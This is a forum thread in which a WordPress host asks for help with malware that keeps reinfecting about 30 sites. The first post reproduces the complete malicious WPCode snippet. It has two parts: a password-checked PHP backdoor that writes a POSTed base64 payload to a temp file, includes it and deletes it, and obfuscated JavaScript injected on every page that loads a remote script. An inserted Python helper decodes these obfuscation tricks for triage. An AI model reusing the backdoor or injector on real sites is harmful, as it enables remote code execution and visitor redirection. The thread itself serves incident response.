

I need help - Wordpress Malware


4 replies to this topic

#1 Dapengi

  • Members
  • 4 posts

Posted 25 June 2024 - 11:15 AM

Good morning everyone,

 

I am stumped by this one. I am hosting about 30 sites on a Hostinger account. They are all running WordPress. I noticed a few nights ago that one of the sites was redirecting to spam and I started investigating. When I logged in to that site I noticed that WPCode Snippets was installed and there were several new admin users: Crander, wp_update-1719330159, and wp_cron1719330159. The PHP snippet is called "Wordpress Snippet" and contains the following code.

 

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "<script>var _0x3ec646=_0x38c3;(function(_0x2be3b3,_0x4eaeab){var _0x383697=_0x38c3,_0x8113a5=_0x2be3b3();while(!![]){try{var _0x351603=parseInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return 
_0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}</script>";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} 

 

I then began checking the other sites that I host, and all of them have the same problem, which is where I am stumped. Over the weekend I restored every site to the oldest backups I had and set up Wordfence and 2FA on each one. I came back this morning to check on them and each site is back to having the code snippets installed and the additional user accounts. I am now running malware scans with Quttera and MalCure, but in all my years of using WordPress I've never had a problem like this and don't even know where to start.

 

Please help. 
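The snippet in the first post hides its function names by splitting them into concatenated PHP string literals ("fi"."le"."_put"."_contents"), keeps the PHP opening tag as a base64 fragment, and assembles the URL of the injected script from String.fromCharCode() byte values. The following Python helper is an added example for this thread, not code from the poster or from any named tool: it undoes those three tricks and flags the behaviours a reviewer would look for (a file written from base64 into the temp dir and included, then unlinked; a wp_head hook that injects a script on every page). SAMPLE is a constructed stand-in that copies only the obfuscation style; its byte list decodes to https://example.com as a placeholder, not the address in the real snippet. The username check reads the 10-digit suffix of wp_update-1719330159 / wp_cron1719330159 as a Unix timestamp, which is an interpretation offered here, not something the post states.

```python
"""Defender-side triage for a suspicious WPCode snippet (added example, not
code from the thread).  SAMPLE is constructed: it copies the obfuscation
style of the posted snippet but its byte list spells https://example.com."""
import base64
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional

SAMPLE = r'''$a1='m'.'d5';
$a2="fi"."le"."_put"."_contents";
$a22="base"."64"."_d"."ecode";
$a222="PD"."9wa"."HAg";
$a3="sy"."s_ge"."t_te"."mp_dir";
@$a2($a3,$a22($a222).$a22($a2222));include($a3);@unlink($a3);
echo "<script>f['src']=String['fromCharCode'](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x65,0x78,0x61,0x6d,0x70,0x6c,0x65,0x2e,0x63,0x6f,0x6d)</script>";
add_action('wp_head','_set_betas_tag');'''

# A quoted PHP literal without escapes, and a chain of them glued with "."
_LIT = r"""(?:"[^"\\]*"|'[^'\\]*')"""
_CONCAT = re.compile(_LIT + r"(?:\s*\.\s*" + _LIT + r")+")
# Eight or more comma-separated byte literals: the String.fromCharCode pattern
_HEXLIST = re.compile(r"(?:0x[0-9a-fA-F]{2}\s*,\s*){7,}0x[0-9a-fA-F]{2}")
# Quoted token that looks like base64 (only meaningful after join_concats)
_B64LIT = re.compile(r"""["']([A-Za-z0-9+/]{8,}={0,2})["']""")
# Planted admin names from the post carry a 10-digit suffix
_USER_TS = re.compile(r"^(?:wp_update-|wp_cron)(\d{10})$")

# Behaviours worth flagging; every pattern in a group must be present
INDICATORS: Dict[str, List[str]] = {
    "drops a file and includes it": [r"file_put_contents", r"\binclude\s*\("],
    "decodes base64 at runtime": [r"base64_decode"],
    "stages payload in the temp dir": [r"sys_get_temp_dir"],
    "removes its own dropper": [r"\bunlink\s*\("],
    "hooks wp_head on every page": [r"add_action\s*\(\s*['\"]wp_head['\"]"],
    "builds a URL from char codes": [r"fromCharCode"],
}


def join_concats(src: str) -> str:
    """Collapse 'fi'.'le' style concatenation so the real names become greppable."""
    def _join(m):
        parts = re.findall(_LIT, m.group(0))
        return '"' + "".join(p[1:-1] for p in parts) + '"'
    return _CONCAT.sub(_join, src)


def decode_char_lists(src: str) -> List[str]:
    """Turn every long run of byte literals back into text."""
    out = []
    for m in _HEXLIST.finditer(src):
        vals = [int(v, 16) for v in re.findall(r"0x[0-9a-fA-F]{2}", m.group(0))]
        out.append(bytes(vals).decode("ascii", errors="replace"))
    return out


def decode_b64_literals(src: str) -> Dict[str, str]:
    """Base64-decode quoted tokens, keeping only those that yield printable ASCII."""
    found: Dict[str, str] = {}
    for m in _B64LIT.finditer(src):
        tok = m.group(1)
        if len(tok) % 4:
            continue
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        if raw and all(32 <= b < 127 for b in raw):
            found[tok] = raw.decode("ascii")
    return found


def find_indicators(joined: str) -> List[str]:
    """Names of the INDICATORS groups whose patterns all match."""
    return [name for name, pats in INDICATORS.items()
            if all(re.search(p, joined) for p in pats)]


def triage(src: str) -> dict:
    """Deobfuscate names first, then run the three decoders on one snippet."""
    joined = join_concats(src)
    return {
        "indicators": find_indicators(joined),
        "char_code_strings": decode_char_lists(joined),
        "base64_literals": decode_b64_literals(joined),
    }


def epoch_in_username(login: str) -> Optional[datetime]:
    """Read the suffix of wp_update-<digits> / wp_cron<digits> as a Unix time
    (an interpretation of the names in the post, handy for lining the account
    creation up with access logs); None for any other login."""
    m = _USER_TS.match(login)
    return datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc) if m else None


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
    for login in ("Crander", "wp_update-1719330159", "wp_cron1719330159"):
        print(login, "->", epoch_in_username(login))
```

To use it on a real snippet, export the snippet body from the plugin as text and pass that string to triage(); nothing in the helper executes the PHP or the JavaScript. Note that decode_b64_literals finds nothing on the raw SAMPLE and only succeeds after join_concats, which is exactly why a plain grep for base64_decode or file_put_contents misses this style of snippet. With 30 sites on one account, the same checks can be run over each site's stored snippets and its user list to see how far the re-infection reaches.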




#2 Oh My!

  • Malware Response Instructor
  • 58,110 posts
  • Location: California

Posted 26 June 2024 - 12:19 PM

Greetings and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

===================================================

Ground Rules:
  • First, please keep in mind most of us at BleepingComputer volunteer our assistance for your benefit in your time of need. Please try to match our commitment to you with your patience toward us.
  • It is important to not run any tools or take any steps other than those I will provide for you.
  • Please perform all steps in the order they are listed. If things are not clear or you experience problems be sure to stop and let me know.
  • Please copy and paste all logs into your post unless otherwise requested.
  • When your computer is clean I will let you know, provide instructions to remove tools and reports, and offer you information about how you can combat future infections.
  • If you do not reply to your topic after 5 days I will assume it has been abandoned and I will close it.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and let me know.

Thank you for your patience thus far. I am not familiar with Wordpress but let's see what we can do.

Please do this.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recovery Scan Tool for 64 bit systems and note where the file is saved (Desktop, Downloads, etc.) <<< Important
  • If your computer language is other than English right click on the FRST64 icon and rename it to FRST64english
  • Right click on the icon and select Run as administrator
  • Note: If you receive any warning about the download it is a false positive and you can ignore it. Click on More info to get the Run anyway option
  • Click Yes to the disclaimer
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of each report in separate reply windows
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • FRST.txt
  • Addition.txt

Gary 

Lord, to whom shall we go? You have the words of eternal life. We have come to believe and to know that you are the Holy One of God.

John 6:68-69

#3 Dapengi

  • Topic Starter
  • Members
  • 4 posts

Posted 27 June 2024 - 05:04 PM

I don't have access to a Windows computer to be able to perform this. Is there a Mac or Docker alternative?



#4 Oh My!

  • Malware Response Instructor
  • 58,110 posts
  • Location: California

Posted 27 June 2024 - 08:43 PM

I would recommend you visit Malwarebytes Mac Malware Removal Help & Support Forum.


Gary 


#5 Oh My!

  • Malware Response Instructor
  • 58,110 posts
  • Location: California

Posted Yesterday, 08:12 AM

Are we all set?
Gary 




